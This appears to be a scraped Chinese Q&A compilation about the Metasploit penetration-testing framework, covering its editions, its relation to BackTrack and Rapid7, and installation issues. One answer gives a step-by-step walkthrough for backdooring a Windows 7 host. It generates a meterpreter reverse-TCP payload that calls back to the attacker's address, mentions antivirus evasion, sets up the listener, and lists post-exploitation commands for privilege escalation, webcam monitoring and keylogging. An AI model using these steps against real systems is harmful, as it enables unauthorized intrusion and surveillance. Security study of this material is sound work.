metasploit版本區別

A. Metasploit和backtrack有什麼區別

metasploit只是一個滲透框架，比較專注，算是一款工具，backtrack是linux定製系統，繼承了非常多種類的工具，backtrack上面也有刪減版本的metasploit 不知道我說的明白不

B. 關於metasploit

裝BT5吧 BT5裡面有Metasploit 你的系統應該是XP的 所以不太支持

C. metasploit對不同語言操作系統敏感么

Metasploit利用時對目標主機操作系統不同語言版本是有區分的，比如目標同樣是Windows XP的操作系統，有的exploit只能對英文版進行利用，簡體中文版就不行，不過這種情況很少罷了。

D. Metasploit最大化安裝之後，雙擊Metasploit Console打開就直接關閉了什麼原因而且

升級後的metasploit的web版本以失效

新版本將web界面改為GUI,但非英語版本操作系統安裝會有兼容性問題，記得在安裝時候記得要如下修改方可正常安裝，
控制面板→區域和語言選項→標准和格式→英語(美國)

安裝完畢後記得改回來。

你的問題和你的截圖不相符，截圖是Web,提問是Console,這是兩種不同的界面，如果是升級過Metasploit，瀏覽器打不開是正常的。,

E. Rapid7的Rapid7 介紹

Rapid7 的安裝風險智能解決方案包括集成的風險管理和滲透測試產品 Nexpose 和 Metasploit, 它們使您的機構能對安全威脅和風險形勢，主動獲得准確的情報以及可操作的情境信息。Rapid7 獨一無二地定位於提供安全風險情報的閉環解決方案，通過組合Nexpose的漏洞管理功能和Metasploit的滲透測試與風險驗證功能，從而動態確定風險的存在和可能性。通過將數據與漏洞、濫用、惡意軟體、錯誤配置和滲透測試信息相關聯， Rapid7 將您電腦環境中的真實風險（Real Risk™）數量化。准確掌握了這些情境信息，我們可以提供清晰簡潔的緩解建議和補救策略，並隨時檢測和跟蹤風險趨勢。 Rapid7 Nexpose 識別和管理「可被利用的」漏洞。
基於准確的風險信息，制定更明智的安全決策。
Rapid7 Nexpose 啟用了全景式的漏洞管理，使得網路安全團隊能夠更快制定更佳的決策。Nexpose 確保您可以：
掃描您的 100% 基礎設施：掃描資料庫，網路應用程序和所有的網路設備，確保您掌握所有漏洞的方方面面。
准確理解您的真實風險形勢：持續發現物理的和虛擬的資產，並集成惡意軟體和濫用風險的信息，Nexpose助您精確洞察最重大的風險。
迅速准確地區分風險的優先順序：通過掃描發現成千上萬的漏洞；使用 Real Risk，Nexpose 有效地將您的補救措施按優先順序排列，避免浪費您的時間。
校驗漏洞是否已被補救：使用Metasploit集成的數據，您的安全團隊可以校驗補救措施是否成功，減少重復勞動，更有效地降低風險。
基於全部物理資產和虛擬資產的詳細風險報告，Nexpose 提供了情境化的，詳細的，依序排列的補救路線圖，並帶有每個任務的時間預期，從而更有效更高效地降低風險。 Metasploit 幫助驗證漏洞和補救方案，並管理風險評估。
通過開源社區和Rapid7之間的合作, Metasploit® 軟體幫助安全專家和IT專業人士識別安全風險，校驗漏洞補救措施，並管理專家參與的安全評估。它提供了真正的安全風險信息，有助預防數據泄露。
功能包括智能利用，密碼審計，網路應用程序掃描，以及社會化編程。各種團隊可以在Metasploit 協同工作並在合並的報表中提供他們的結果。
Metasploit 版本覆蓋免費版到專業企業版，都基於Metasploit Framework，它是一個開源軟體開發包，帶有世界最大的保證質量的公開漏洞庫。 Metasploit Express提供了一個GUI（基於Web的），它不但可以訪問標準的Metasploit Framework的所有功能，而且還給使用Metasploit進行入侵檢測提供了一個流程。Metasploit Framework是一個工具包，而Metasploit Express為了完成特定的任務把這些工具組合到了一起。
使用Metasploit Express提供的界面可以依次對目標網路進行掃描，安全漏洞發掘，和暴力破解。我們可以很快地從被攻擊的機器收集到相關的證據，然後它會使用像Pass-the-Hash和SSH key reuse那樣的技術，進一步執行安全漏洞發掘和暴力破解。在入侵檢測完成以後，會生成一份高質量的報告，這份報告包括檢測的結果和檢測期間執行的每個操作的審核日誌。

F. metasploit 和rapid7是什麼關系

Metasploit是開源的滲透測試工具，rapid7是一家專門做漏洞掃描和風險管理安全解決方案的廠商，09年收購Metasploit，出了自己的產品叫Metasploit Pro版本。Pro版和Framework版功一樣，所有功能兩個都能做，只不過Pro版支持自動化和圖形界面。相比Framework效率更高。

G. Metasploit和backtrack有什麼區別

backtrack是一款基於ubuntu的linux系統。裡面植入大量安全工具。
metasploit是一款工具。載入了大量的漏洞利用工具exploit實為滲透利器。堪稱入侵整個新球的工具！

H. metasploit中srvhost和lhost有什麼不同

srvhost設置攻擊的IP

如果掃描用Namp那就是host查看掃描出來的資料庫

host我記得是列出當前可用資料庫吧

I. 如何利用metasploit進行漏洞掃描和攻擊

很多朋友對使用Metasploit利用後門程序進行滲透windows7都比較感興趣，針對這些以下業內相關專家就給大家介紹下，當下黑客怎麼利用Metasploit進行滲透windows7的。設定目標主機為：cn_win7_x86_7601虛擬機，地址為：192.168.0.116；而本地主機就為：192.168.0.149。方法步驟一：黑客用Msfpayload直接生成相關的後門程序，如下圖。sfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.0.149x>steup.exe方法步驟二：黑客直接就能進入所在的目錄並將屬性進行修改，換為允許以程序執行文件，詳細如下圖。進入所在目錄，修改屬性：選擇「允許以程序執行文件」,這時候也可以做一些免殺方法步驟三：接著黑客就打開msfconsole並載入exploit/multi/handler模塊並進行設置本地主機，最後就能開始進行監聽了，詳細情況如下圖。打開msfconsole，載入exploit/multi/handler模塊，設置本地主機；然後開始監聽：exploit-z-j：方法步驟四：黑客需要能將程序直接拷貝都目標主機中並進行執行。方法步驟五：以上步驟全部完成後黑客就能通過後門程序反向連接到msf，用msf就能發起第2次的攻擊然後使用客戶端也就是後門程序就能連接都服務端msf，詳細的如下圖。Meterpreter就是metasploit框架中的一個擴展模塊，因此的話溢出成功後黑客就能攻擊載荷進行使用，一旦攻擊載荷在溢出攻擊成功後就能再返回一個控制通道，這樣就能將它作為攻擊載荷成功獲得目標系統的一個meterpretershell的鏈接。另外，附meterpreter常用命令：getsystem#會自動利用各種各樣的系統漏洞來進行許可權提升migrate#進程id進程遷移background#把當前的會話設置為背景，需要的時候在啟用getuid#查看對方正在運行的用戶ps#列出所有的進程getpid#返回運行meterpreter的id號sysinfo#產看系統信息和體系結構shell#切換到cmd的系統許可權方式exit#退出shell會話返回meterpreter或終止meterpretergetdesktop截取目標主機當前桌面會話窗口runwebcam-p/var/www#在/var/www目錄監控目標主機的攝像頭keylog_recorder#使用migrate將會話遷移至explorer.exe的進程空間後記錄鍵盤

J. metasploit官網的兩個版本使用哪一個呢

免費版本的是沒有自動攻擊 而商業版本的有全自動自動攻擊